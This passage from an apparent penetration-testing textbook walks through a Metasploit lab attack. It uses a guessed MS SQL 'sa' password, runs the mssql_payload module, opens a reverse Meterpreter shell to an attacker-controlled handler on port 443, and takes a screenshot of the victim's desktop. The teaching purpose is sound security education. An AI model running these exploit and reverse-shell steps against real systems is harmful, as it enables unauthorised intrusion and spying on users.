background image

80

Chapter 6

msf exploit(mssql_payload) > 

set LPORT 443

LPORT => 443
msf exploit(mssql_payload) > 

set RHOST 192.168.33.130

RHOST => 192.168.33.130
msf exploit(mssql_payload) > 

set PASSWORD password123

PASSWORD => password123
msf exploit(mssql_payload) > 

exploit

[*] Started reverse handler on 192.168.33.129:443
[*] Command Stager progress - 2.78% done (1494/53679 bytes)
[*] Command Stager progress - 5.57% done (2988/53679 bytes)
[*] Command Stager progress - 8.35% done (4482/53679 bytes)

. . . SNIP . . .

[*] Command Stager progress - 97.32% done (52239/53679 bytes)
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1699)
meterpreter > 

After selecting the 

mssql_payload

 module and setting our payload to 

meterpreter

 at  , all we need to do is set the standard options before starting 

our Meterpreter session. We’ve succeeded in opening a Meterpreter session 
at   on the target machine.

To recap, in the attack described here, we used the 

mssql_ping

 module 

to guess the MS SQL 

sa

 password, which we discovered is 

password123

. We 

then leveraged the 

mssql_payload

 module to communicate with MS SQL and 

upload a Meterpreter shell through MS SQL, and the shell was presented to 
us, thereby completely compromising the system. Once the Meterpreter shell 
is presented, we know that the exploit was successful and we can continue 
with post exploitation on this system.

Basic Meterpreter Commands

Having successfully compromised the target and gained a Meterpreter console 
on the system, we can glean more information with some basic Meterpreter 
commands. Use the 

help

 command at any point for more information on 

how to use Meterpreter.

Capturing a Screenshot

Meterpreter’s 

screenshot

 command will export an image of the active user’s 

desktop and save it to the 

/opt/metasploit3/msf3/

 directory, as shown in Figure 6-1.

meterpreter > 

screenshot

Screenshot saved to: /opt/metasploit3/msf3/yVHXaZar.jpeg

Desktop screen captures offer a great way to learn about a target system. 

For example, in Figure 6-1, we can see that McAfee antivirus software is 
installed and running, which means we’ll need to be cautious about what we 
upload to the system. (Chapter 7 discusses antivirus evasion in more detail.)